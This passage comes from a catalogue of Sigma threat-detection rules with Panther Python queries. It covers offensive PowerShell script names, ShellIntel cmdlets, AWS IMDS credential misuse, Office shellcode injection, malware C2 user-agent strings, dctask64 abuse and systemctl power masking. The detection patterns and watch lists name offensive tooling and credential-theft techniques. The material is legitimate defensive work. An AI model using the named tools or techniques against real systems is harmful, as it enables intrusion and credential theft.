            - 'Invoke-ReverseDNSLookup.ps1'
            - 'Invoke-Rubeus.ps1'
            - 'Invoke-RunAs.ps1'
            - 'Invoke-SafetyKatz.ps1'
            - 'Invoke-SauronEye.ps1'
            - 'Invoke-SCShell.ps1'
            - 'Invoke-Seatbelt.ps1'
            - 'Invoke-ServiceAbuse.ps1'
            - 'Invoke-SessionGopher.ps1'
            - 'Invoke-ShellCode.ps1'
            - 'Invoke-SMBScanner.ps1'
            - 'Invoke-Snaffler.ps1'
            - 'Invoke-Spoolsample.ps1'
            - 'Invoke-SSHCommand.ps1'
            - 'Invoke-SSIDExfil.ps1'
            - 'Invoke-StandIn.ps1'
            - 'Invoke-StickyNotesExtract.ps1'
            - 'Invoke-Tater.ps1'
            - 'Invoke-Thunderfox.ps1'
            - 'Invoke-ThunderStruck.ps1'
            - 'Invoke-TokenManipulation.ps1'
            - 'Invoke-Tokenvator.ps1'
            - 'Invoke-TotalExec.ps1'
            - 'Invoke-UrbanBishop.ps1'
            - 'Invoke-UserHunter.ps1'
            - 'Invoke-VoiceTroll.ps1'
            - 'Invoke-Whisker.ps1'
            - 'Invoke-WinEnum.ps1'
            - 'Invoke-winPEAS.ps1'
            - 'Invoke-WireTap.ps1'
            - 'Invoke-WmiCommand.ps1'
            - 'Invoke-WScriptBypassUAC.ps1'
            - 'Invoke-Zerologon.ps1'
            - 'Keylogger.ps1'
            - 'MailRaider.ps1'
            - 'New-HoneyHash.ps1'
            - 'OfficeMemScraper.ps1'
            - 'Offline_Winpwn.ps1'
            - 'Out-CHM.ps1'
            - 'Out-DnsTxt.ps1'
            - 'Out-Excel.ps1'
            - 'Out-HTA.ps1'
            - 'Out-Java.ps1'
            - 'Out-JS.ps1'
            - 'Out-Minidump.ps1'
            - 'Out-RundllCommand.ps1'
            - 'Out-SCF.ps1'
            - 'Out-SCT.ps1'
            - 'Out-Shortcut.ps1'
            - 'Out-WebQuery.ps1'
            - 'Out-Word.ps1'
            - 'Parse_Keys.ps1'
            - 'Port-Scan.ps1'
            - 'PowerBreach.ps1'
            - 'powercat.ps1'
            - 'PowerRunAsSystem.psm1'
            - 'PowerSharpPack.ps1'
            - 'PowerUp.ps1'
            - 'PowerUpSQL.ps1'
            - 'PowerView.ps1'
            - 'PSAsyncShell.ps1'
            - 'RemoteHashRetrieval.ps1'
            - 'Remove-Persistence.ps1'
            - 'Remove-PoshRat.ps1'
            - 'Remove-Update.ps1'
            - 'Run-EXEonRemote.ps1'
            - 'Schtasks-Backdoor.ps1'
            - 'Set-DCShadowPermissions.ps1'
            - 'Set-MacAttribute.ps1'
            - 'Set-RemotePSRemoting.ps1'
            - 'Set-RemoteWMI.ps1'
            - 'Set-Wallpaper.ps1'
            - 'Show-TargetScreen.ps1'
            - 'Speak.ps1'
            - 'Start-CaptureServer.ps1'
            - 'Start-WebcamRecorder.ps1'
            - 'StringToBase64.ps1'
            - 'TexttoExe.ps1'
            - 'Veeam-Get-Creds.ps1'
            - 'VolumeShadowCopyTools.ps1'
            - 'WinPwn.ps1'
            - 'WSUSpendu.ps1'
    selection_invoke_sharp:
        ContextInfo|contains|all:
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - '.ps1'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high
high
Malicious ShellIntel PowerShell Commandlets
Detects Commandlet names from ShellIntel exploitation scripts.
status test author Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) id 402e1e1d-ad59-47b6-bf80-1ee44985b3a7
panther query
def rule(event):
    if any(
        [
            "Invoke-SMBAutoBrute" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-GPOLinks" in event.deep_get("ScriptBlockText", default=""),
            "Invoke-Potato" in event.deep_get("ScriptBlockText", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious ShellIntel PowerShell Commandlets
id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7
status: test
description: Detects Commandlet names from ShellIntel exploitation scripts.
references:
    - https://github.com/Shellntel/scripts/
author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
date: 2021-08-09
modified: 2023-01-02
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - 'Invoke-SMBAutoBrute'
            - 'Invoke-GPOLinks'
            # - 'Out-Minidump' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
            - 'Invoke-Potato'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
status test author jamesc-grafana id 352a918a-34d8-4882-8470-44830c507aa3
panther query
import re


def rule(event):
    if all(
        [
            re.match(r".+:assumed-role/aws:.+", event.deep_get("userIdentity", "arn", default="")),
            not any(
                [
                    event.deep_get("eventSource", default="") == "ssm.amazonaws.com",
                    event.deep_get("eventName", default="") == "RegisterManagedInstance",
                    event.deep_get("sourceIPAddress", default="") == "AWS Internal",
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
id: 352a918a-34d8-4882-8470-44830c507aa3
status: test
description: |
    Detects when an instance identity has taken an action that isn't inside SSM.
    This can indicate that a compromised EC2 instance is being used as a pivot point.
references:
    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html
    - https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/
    - https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things
author: jamesc-grafana
date: 2024-07-11
tags:
    - attack.privilege-escalation
    - attack.initial-access
    - attack.persistence
    - attack.stealth
    - attack.t1078
    - attack.t1078.002
logsource:
    product: aws
    service: cloudtrail
detection:
    selection:
        userIdentity.arn|re: '.+:assumed-role/aws:.+'
    filter_main_generic:
        - eventSource: 'ssm.amazonaws.com'
        - eventName: 'RegisterManagedInstance'
        - sourceIPAddress: 'AWS Internal'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services
level: high
high
Malware Shellcode in Verclsid Target Process
Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
status test author John Lambert (tech), Florian Roth (Nextron Systems) id b7967e22-3d7e-409b-9ed5-cdae3f9243a1
panther query
def rule(event):
    if all(
        [
            event.deep_get("TargetImage", default="").endswith("\\verclsid.exe"),
            event.deep_get("GrantedAccess", default="") == "0x1FFFFF",
            any(
                [
                    all(
                        [
                            "|UNKNOWN(" in event.deep_get("CallTrace", default=""),
                            "VBE7.DLL" in event.deep_get("CallTrace", default=""),
                        ]
                    ),
                    all(
                        [
                            "\\Microsoft Office\\" in event.deep_get("SourceImage", default=""),
                            "|UNKNOWN" in event.deep_get("CallTrace", default=""),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malware Shellcode in Verclsid Target Process
id: b7967e22-3d7e-409b-9ed5-cdae3f9243a1
status: test
description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
references:
    - https://twitter.com/JohnLaTwC/status/837743453039534080
author: John Lambert (tech), Florian Roth (Nextron Systems)
date: 2017-03-04
modified: 2021-11-27
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - detection.emerging-threats
logsource:
    category: process_access
    product: windows
    definition: 'Requirements: The following config is required to generate the necessary Event ID 10 Process Access events: <ProcessAccess onmatch="include"><CallTrace condition="contains">VBE7.DLL</CallTrace></ProcessAccess><ProcessAccess onmatch="exclude"><CallTrace condition="excludes">UNKNOWN</CallTrace></ProcessAccess>'
detection:
    selection_target:
        TargetImage|endswith: '\verclsid.exe'
        GrantedAccess: '0x1FFFFF'
    selection_calltrace_1:
        CallTrace|contains|all:
            - '|UNKNOWN('
            - 'VBE7.DLL'
    selection_calltrace_2:
        SourceImage|contains: '\Microsoft Office\'
        CallTrace|contains: '|UNKNOWN'
    condition: selection_target and 1 of selection_calltrace_*
falsepositives:
    - Unknown
level: high
high
Malware User Agent
Detects suspicious user agent strings used by malware in proxy logs
status test author Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) id 5c84856b-55a5-45f1-826f-13f37250cf4e
panther query
def rule(event):
    if any(
        [
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)",
            event.deep_get("c-useragent", default="") == "HttpBrowser/1.0",
            "<|>" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="") == "nsis_inetc (mozilla)",
            event.deep_get("c-useragent", default="") == "Wget/1.9+cvs-stable (Red Hat modified)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)",
            "zeroup" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").startswith(
                "Mozilla/5.0 (Windows NT 5.1 ; v."
            ),
            " adlib/" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").endswith(" tiny"),
            " BGroom " in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").endswith(" changhuatong"),
            event.deep_get("c-useragent", default="").endswith(" CholTBAgent"),
            event.deep_get("c-useragent", default="") == "Mozilla/5.0 WinInet",
            event.deep_get("c-useragent", default="") == "RookIE/1.0",
            event.deep_get("c-useragent", default="") == "M",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)",
            event.deep_get("c-useragent", default="") == "backdoorbot",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)",
            event.deep_get("c-useragent", default="") == "Opera/8.81 (Windows NT 6.0; U; en)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)",
            event.deep_get("c-useragent", default="") == "Opera",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
            event.deep_get("c-useragent", default="") == "MSIE",
            event.deep_get("c-useragent", default="").endswith("(Charon; Inferno)"),
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)",
            event.deep_get("c-useragent", default="") == "Mozilla/5.0 (Windows NT 6.1)",
            event.deep_get("c-useragent", default="") == "AppleWebkit/587.38 (KHTML, like Gecko)",
            event.deep_get("c-useragent", default="") == "Chrome/91.0.4472.77",
            event.deep_get("c-useragent", default="") == "Safari/537.36",
            event.deep_get("c-useragent", default="") == "Edge/91.0.864.37",
            event.deep_get("c-useragent", default="") == "Firefox/89.0",
            event.deep_get("c-useragent", default="") == "Gecko/20100101",
            " pxyscand" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").endswith(" asd"),
            event.deep_get("c-useragent", default="").endswith(" mdms"),
            event.deep_get("c-useragent", default="") == "sample",
            event.deep_get("c-useragent", default="") == "nocase",
            event.deep_get("c-useragent", default="") == "Moxilla",
            event.deep_get("c-useragent", default="").startswith("Win32 "),
            "Microsoft Internet Explorer" in event.deep_get("c-useragent", default=""),
            event.deep_get("c-useragent", default="").startswith("agent "),
            event.deep_get("c-useragent", default="") == "AutoIt",
            event.deep_get("c-useragent", default="") == "IczelionDownLoad",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)",
            event.deep_get("c-useragent", default="") == "record",
            event.deep_get("c-useragent", default="") == "mozzzzzzzzzzz",
            event.deep_get("c-useragent", default="")
            == "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
            event.deep_get("c-useragent", default="") == "Havana/0.1",
            event.deep_get("c-useragent", default="") == "antSword/v2.1",
            event.deep_get("c-useragent", default="") == "rqwrwqrqwrqw",
            event.deep_get("c-useragent", default="") == "qwrqrwrqwrqwr",
            event.deep_get("c-useragent", default="") == "rc2.0/client",
            event.deep_get("c-useragent", default="") == "TakeMyPainBack",
            event.deep_get("c-useragent", default="") == "xxx",
            event.deep_get("c-useragent", default="") == "20112211",
            event.deep_get("c-useragent", default="") == "23591",
            event.deep_get("c-useragent", default="") == "901785252112",
            event.deep_get("c-useragent", default="") == "1235125521512",
            event.deep_get("c-useragent", default="") == "125122112551",
            event.deep_get("c-useragent", default="") == "B1D3N_RIM_MY_ASS",
            event.deep_get("c-useragent", default="") == "AYAYAYAY1337",
            event.deep_get("c-useragent", default="") == "iMightJustPayMySelfForAFeature",
            event.deep_get("c-useragent", default="") == "ForAFeature",
            event.deep_get("c-useragent", default="").startswith("Ares_ldr_v_"),
            event.deep_get("c-useragent", default="") == "Microsoft Internet Explorer",
            event.deep_get("c-useragent", default="") == "CLCTR",
            event.deep_get("c-useragent", default="") == "uploader",
            event.deep_get("c-useragent", default="") == "agent",
            event.deep_get("c-useragent", default="") == "License",
            event.deep_get("c-useragent", default="") == "vb wininet",
            event.deep_get("c-useragent", default="") == "Client",
            event.deep_get("c-useragent", default="") == "Lilith-Bot/3.0",
            event.deep_get("c-useragent", default="") == "svc/1.0",
            event.deep_get("c-useragent", default="") == "WSHRAT",
            event.deep_get("c-useragent", default="") == "ZeroStresser Botnet/1.5",
            event.deep_get("c-useragent", default="") == "OK",
            event.deep_get("c-useragent", default="") == "Project1sqlite",
            event.deep_get("c-useragent", default="") == "Project1",
            event.deep_get("c-useragent", default="") == "DuckTales",
            event.deep_get("c-useragent", default="") == "Zadanie",
            event.deep_get("c-useragent", default="") == "GunnaWunnaBlueTips",
            event.deep_get("c-useragent", default="") == "Xlmst",
            event.deep_get("c-useragent", default="") == "GeekingToTheMoon",
            event.deep_get("c-useragent", default="") == "SunShineMoonLight",
            event.deep_get("c-useragent", default="") == "BunnyRequester",
            event.deep_get("c-useragent", default="") == "BunnyTasks",
            event.deep_get("c-useragent", default="") == "BunnyStealer",
            event.deep_get("c-useragent", default="") == "BunnyLoader_Dropper",
            event.deep_get("c-useragent", default="") == "BunnyLoader",
            event.deep_get("c-useragent", default="") == "BunnyShell",
            event.deep_get("c-useragent", default="") == "SPARK-COMMIT",
            event.deep_get("c-useragent", default="") == "4B4DB4B3",
            event.deep_get("c-useragent", default="") == "SouthSide",
            event.deep_get("c-useragent", default="")
            == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)",
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malware User Agent
id: 5c84856b-55a5-45f1-826f-13f37250cf4e
status: test
description: Detects suspicious user agent strings used by malware in proxy logs
references:
    - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
    - http://www.botopedia.org/search?searchword=scan&searchphrase=all
    - https://networkraptor.blogspot.com/2015/01/user-agent-strings.html
    - https://perishablepress.com/blacklist/ua-2013.txt
    - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents
    - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q
    - https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large
    - https://twitter.com/crep1x/status/1635034100213112833
author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-07-08
modified: 2024-04-14
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-useragent:
            # RATs
            - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DragonOK
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439
            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439
            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  1.1.4322)' # Used by PlugX - old - https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/
            - 'HttpBrowser/1.0' # HTTPBrowser RAT
            - '*<|>*' # Houdini / Iniduoh / njRAT
            - 'nsis_inetc (mozilla)' # ZeroAccess
            - 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre
            # Ghost419 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)'
            # Malware
            - '*zeroup*' # W32/Renos.Downloader
            - 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy
            - '* adlib/*'
            - '* tiny' # Trojan Downloader
            - '* BGroom *' # Trojan Downloader
            - '* changhuatong'
            - '* CholTBAgent'
            - 'Mozilla/5.0 WinInet'
            - 'RookIE/1.0'
            - 'M' # HkMain
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probable prone to false positives
            - 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes
            - 'backdoorbot'
            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality
            - 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality
            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality
            - 'Opera' # Trojan Keragany
            - 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit
            - 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect
            - 'MSIE' # Toby web shell
            - '*(Charon; Inferno)' # Loki Bot
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony
            - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://www.virustotal.com/gui/file/8abbef8e58f012d45a7cb46c3c2729dcd33cf53e721ff8c59e238862aa0a9e0e/detection
            - 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware https://www.virustotal.com/gui/file/d60f61f1f03a5011a0240694e110c6d370bf68a92753093186c6d14e26a15428/detection https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again
            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/
            # Ursnif
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)'
            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)'
            # Emotet
            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968
            # Lockbit (https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q)
            - 'Mozilla/5.0 (Windows NT 6.1)'
            - 'AppleWebkit/587.38 (KHTML, like Gecko)'
            - 'Chrome/91.0.4472.77'
            - 'Safari/537.36'
            - 'Edge/91.0.864.37'
            - 'Firefox/89.0'
            - 'Gecko/20100101'
            # Others
            - '* pxyscand*'
            - '* asd'
            - '* mdms'
            - 'sample'
            - 'nocase'
            - 'Moxilla'
            - 'Win32 *'
            - '*Microsoft Internet Explorer*'
            - 'agent *'
            - 'AutoIt' # Suspicious - base-lining recommended
            - 'IczelionDownLoad'
            - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/
            - 'record' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
            - 'mozzzzzzzzzzz' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' # Quasar RAT UA https://twitter.com/malmoeb/status/1559994820692672519?s=20&t=g3tkNL09dZZWbFN10qDVjg
            - 'Havana/0.1' # https://www.cybereason.com/blog/threat-alert-havanacrypt-ransomware-masquerading-as-google-update
            - 'antSword/v2.1' # AntSword Webshell UA
            - 'rqwrwqrqwrqw'  # Racoon Stealer
            - 'qwrqrwrqwrqwr'  # Racoon Stealer
            - 'rc2.0/client'  # Racoon Stealer
            - 'TakeMyPainBack'  # Racoon Stealer
            - 'xxx' # Racoon Stealer
            - '20112211' # Racoon Stealer
            - '23591' # Racoon Stealer
            - '901785252112' # Racoon Stealer
            - '1235125521512' # Racoon Stealer
            - '125122112551' # Racoon Stealer
            - 'B1D3N_RIM_MY_ASS' # Racoon Stealer
            - 'AYAYAYAY1337' # Racoon Stealer
            - 'iMightJustPayMySelfForAFeature' # Racoon Stealer
            - 'ForAFeature' # Racoon Stealer
            - 'Ares_ldr_v_*' # AresLoader
            # - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106' # seen used by AresLoader
            - 'Microsoft Internet Explorer' # https://github.com/silence-is-best/c2db
            - 'CLCTR' # https://github.com/silence-is-best/c2db
            - 'uploader' # https://github.com/silence-is-best/c2db
            - 'agent' # https://github.com/silence-is-best/c2db
            - 'License' # https://github.com/silence-is-best/c2db
            - 'vb wininet' # https://github.com/silence-is-best/c2db
            - 'Client' # https://github.com/silence-is-best/c2db
            - 'Lilith-Bot/3.0' # Lilith Stealer - https://twitter.com/suyog41/status/1558051450797690880
            - 'svc/1.0' # SVC Loader - https://twitter.com/suyog41/status/1558051450797690880
            - 'WSHRAT' # WSHRAT - https://twitter.com/suyog41/status/1558051450797690880
            - 'ZeroStresser Botnet/1.5' # Zerobot - https://twitter.com/suyog41/status/1558051450797690880
            - 'OK' # Nymaim - https://twitter.com/suyog41/status/1558051450797690880
            - 'Project1sqlite' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880
            - 'Project1' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880
            - 'DuckTales' # Racoon Stealer
            - 'Zadanie' # Racoon Stealer
            - 'GunnaWunnaBlueTips' # Racoon Stealer
            - 'Xlmst' # Racoon Stealer
            - 'GeekingToTheMoon' # Racoon Stealer
            - 'SunShineMoonLight' # Racoon Stealer
            - 'BunnyRequester' # BunnyStealer
            - 'BunnyTasks' # BunnyStealer
            - 'BunnyStealer' # BunnyStealer
            - 'BunnyLoader_Dropper' # BunnyStealer
            - 'BunnyLoader' # BunnyStealer
            - 'BunnyShell' # BunnyStealer
            - 'SPARK-COMMIT' # SparkRAT - https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware/
            - '4B4DB4B3' # B4B3RAT - https://twitter.com/naumovax/status/1718956514491130301
            - 'SouthSide' # Racoon Stealer
            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)' # Latrodectus loader
    condition: selection
falsepositives:
    - Unknown
level: high
high
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
Detects the execution of "dctask64.exe", a binary signed by ZOHO Corporation that is part of ManageEngine Endpoint Central. This binary can be abused for DLL injection and arbitrary command and process execution.
status test author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) id 6345b048-8441-43a7-9bed-541133633d7a
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\dctask64.exe"),
                    any(
                        [
                            "IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD"
                            in event.deep_get("Hashes", default=""),
                            "IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA"
                            in event.deep_get("Hashes", default=""),
                            "IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3"
                            in event.deep_get("Hashes", default=""),
                            "IMPHASH=F1039CED4B91572AB7847D26032E6BBF"
                            in event.deep_get("Hashes", default=""),
                        ]
                    ),
                ]
            ),
            any(
                [
                    " executecmd64 " in event.deep_get("CommandLine", default=""),
                    " invokeexe " in event.deep_get("CommandLine", default=""),
                    " injectDll " in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
id: 6345b048-8441-43a7-9bed-541133633d7a
status: test
description: |
    Detects the execution of "dctask64.exe", a binary signed by ZOHO Corporation that is part of ManageEngine Endpoint Central.
    This binary can be abused for DLL injection and arbitrary command and process execution.
references:
    - https://twitter.com/gN3mes1s/status/1222088214581825540
    - https://twitter.com/gN3mes1s/status/1222095963789111296
    - https://twitter.com/gN3mes1s/status/1222095371175911424
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2020-01-28
modified: 2025-01-22
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\dctask64.exe'
        - Hashes|contains:
              - 'IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD'
              - 'IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA'
              - 'IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3'
              - 'IMPHASH=F1039CED4B91572AB7847D26032E6BBF'
    selection_cli:
        CommandLine|contains:
            - ' executecmd64 '
            - ' invokeexe '
            - ' injectDll '
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
high
Mask System Power Settings Via Systemctl
Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
status experimental author Milad Cheraghi, Nasreddine Bencherchali id c172b7b5-f3a1-4af2-90b7-822c63df86cb
panther query
def rule(event):
    if all(
        [
            event.deep_get("Image", default="").endswith("/systemctl"),
            " mask" in event.deep_get("CommandLine", default=""),
            any(
                [
                    "suspend.target" in event.deep_get("CommandLine", default=""),
                    "hibernate.target" in event.deep_get("CommandLine", default=""),
                    "hybrid-sleep.target" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Mask System Power Settings Via Systemctl
id: c172b7b5-f3a1-4af2-90b7-822c63df86cb
status: experimental
description: |
    Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
    Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
    This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
author: Milad Cheraghi, Nasreddine Bencherchali
date: 2025-10-17
references:
    - https://www.man7.org/linux/man-pages/man1/systemctl.1.html
    - https://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/
tags:
    - attack.persistence
    - attack.impact
    - attack.t1653
logsource:
    category: process_creation
    product: linux
detection:
    selection_systemctl:
        Image|endswith: '/systemctl'
        CommandLine|contains: ' mask'
    selection_power_options:
        CommandLine|contains:
            - 'suspend.target'
            - 'hibernate.target'
            - 'hybrid-sleep.target'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
high
Mavinject Inject DLL Into Running Process
Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
